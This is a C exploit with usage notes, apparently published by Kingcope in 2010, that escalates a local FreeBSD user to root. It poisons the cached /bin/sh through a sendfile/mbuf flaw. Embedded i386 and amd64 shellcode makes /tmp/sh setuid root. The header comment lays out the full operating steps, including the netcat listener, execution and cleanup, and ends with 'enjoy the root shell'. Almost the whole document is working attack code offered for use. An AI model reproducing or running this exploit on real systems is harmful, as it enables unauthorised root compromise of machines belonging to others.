FreeBSD mbufs() cache poisoning local priv escalation v2 by KCOPE ;>

1. /*
2. freebsd mbufs() sendfile cache poisoning-priv escalation
3. x86/x64 local root xpl v2 by Kingcope
4. 2010
5. --
6. tested on: 8.1-RC1, 8.0-RELEASE, 7.3-RELEASE and
7. 7.2-RELEASE-p8 (xd personally did 7.2 test)
8. poisons /bin/sh to contain shellcode which does this...
9. '
10. chmod a+s /tmp/sh
11. chown root /tmp/sh
12. execve /tmp/sh2
13. '
14. how to use ths is VERY important it is NOT your standard type,
15. DONT start a listener as normal...let this do its shit..
16. and then again, there is a MUCH simpler way you could redo
17. this exploit but, thats for you to find ;) -xd
18.  
19. box 1 (TARGET):
20. $ cp /bin/sh /tmp/sh
21. $ cp /bin/sh /tmp/sh2
22. $ gcc cache.c -o cache
23.  
24. box 2 (LISTENER):
25. $ nc -l 7030
26.  
27. on box 1 do:
28. for i386 type:
29. $ ./cache 1
30. for amd64 type:
31. $ ./cache 2
32.  
33. ok now lets hope this worked and injected the shellcode,should,
34. /bin/sh should be execed by the system as root in ~5 mins if lucky :)
35.  
36. NOW DO:
37. $ /tmp/sh
38. AND cleanup:
39. # cp -f /tmp/sh2 /bin/sh
40. enjoy the root shell!
41. */
42. // this juarez is now private on #darknet
43. // http://www.youtube.com/watch?v=JtgInqNNpCI
44. // http://www.youtube.com/watch?v=IdbRWrY4QBI
45. #include <sys/types.h>
46. #include <sys/socket.h>
47. #include <sys/uio.h>
48. #include <fcntl.h>
49. #include <netinet/in.h>
50. #include <sys/select.h>
51. #include <sys/stat.h>
52. #include <strings.h>
53. #include <stdio.h>
54. #include <string.h>
55. #include <err.h>
56.  
57. main (int argc, char *argv[]) {
58. int s, f, k2;
59. struct sockaddr_in addr;
60. int flags;
61.  
62. char str32[]=
63. "\x31\xc0\x6a\x00\x68\x70\x2f\x73\x68\x68\x2f\x2f\x74\x6d\x89\xe3"
64. "\x50\x50\x53\xb0\x10\x50\xcd\x80\x68\xed\x0d\x00\x00\x53\xb0\x0f"
65. "\x50\xcd\x80\x31\xc0\x6a\x00\x68\x2f\x73\x68\x32\x68\x2f\x74\x6d"
66. "\x70\x89\xe3\x50\x54\x53\x50\xb0\x3b\xcd\x80";
67.  
68. char str64[]=
69. "\x48\x31\xc0\x99\xb0\x10\x48\xbf\xff\x2f\x74\x6d\x70\x2f\x73\x68"
70. "\x48\xc1\xef\x08\x57\x48\x89\xe7\x48\x31\xf6\x48\x31\xd2\x0f\x05"
71. "\xb0\x0f\x48\x31\xf6\x66\xbe\xed\x0d\x0f\x05\x48\x31\xc0\x99\xb0"
72. "\x3b\x48\xbf\x2f\x74\x6d\x70\x2f\x73\x68\x32\x6a\x00\x57\x48\x89"
73. "\xe7\x57\x52\x48\x89\xe6\x0f\x05";
74.  
75. char buf[10000];
76. char *p;
77. struct stat sb;
78. int n;
79. fd_set wset;
80. int64_t size;
81. off_t sbytes;
82. off_t sent = 0;
83. int chunk;
84. int arch = 3;
85. if (argc != 2) {
86. printf("[+] Define architecture i386 or amd64 (1/2)\n");
87. return;
88. }
89. if (strcmp(argv[1], "1") == 0)
90. arch=1;
91. if (strcmp(argv[1], "2") == 0)
92. arch=2;
93. if (arch == 3) {
94. printf("[+] Define architecture i386 or amd64 (1/2)\n");
95. return;
96. }
97. s = socket(AF_INET, SOCK_STREAM, 0);
98. bzero(&addr, sizeof(addr));
99. addr.sin_family = AF_INET;
100. addr.sin_port = htons(7030);
101. addr.sin_addr.s_addr = inet_addr("127.0.0.1");
102. n = connect(s, (struct sockaddr *)&addr, sizeof (addr));
103. if (n < 0)
104. warn ("[-] Failed to connect");
105. f = open("/bin/sh", O_RDONLY);
106. if (f<0)
107. warn("[-] Failed to open file");
108. n = fstat(f, &sb);
109. if (n<0)
110. warn("[-] fstat failed");
111. size = sb.st_size;
112. chunk = 0;
113. flags = fcntl(f, F_GETFL);
114. flags |= O_NONBLOCK;
115. fcntl(f, F_SETFL, flags);
116. while (size > 0) {
117. FD_ZERO(&wset);
118. FD_SET(s, &wset);
119. n = select(f+1, NULL, &wset, NULL, NULL);
120. if (n < 0)
121. continue;
122. if (chunk > 0) {
123. sbytes = 0;
124. if (arch == 1)
125. n = sendfile(f, s, 2048*2, chunk, NULL, &sbytes,0);
126. if (arch == 2)
127. n = sendfile(f, s, 1204*6, chunk, NULL, &sbytes,0);
128. if (n < 0)
129. continue;
130. chunk -= sbytes;
131. size -= sbytes;
132. sent += sbytes;
133. continue;
134. }
135. chunk = 2048;
136. memset(buf, '\0', sizeof buf);
137. if (arch == 1) {
138. for (k2=0;k2<256;k2++) {
139. buf[k2] = 0x90;
140. }
141. p = buf;
142. p = p + k2;
143. memcpy(p, str32, sizeof str32);
144. n = k2 + sizeof str32;
145. p = buf;
146. }
147. if (arch == 2) {
148. for (k2=0;k2<100;k2++) {
149. buf[k2] = 0x90;
150. }
151. p = buf;
152. p = p + k2;
153. memcpy(p, str64, sizeof str64);
154. n = k2 + sizeof str64;
155. p = buf;
156. }
157. write(s, p, n);
158. }
159. }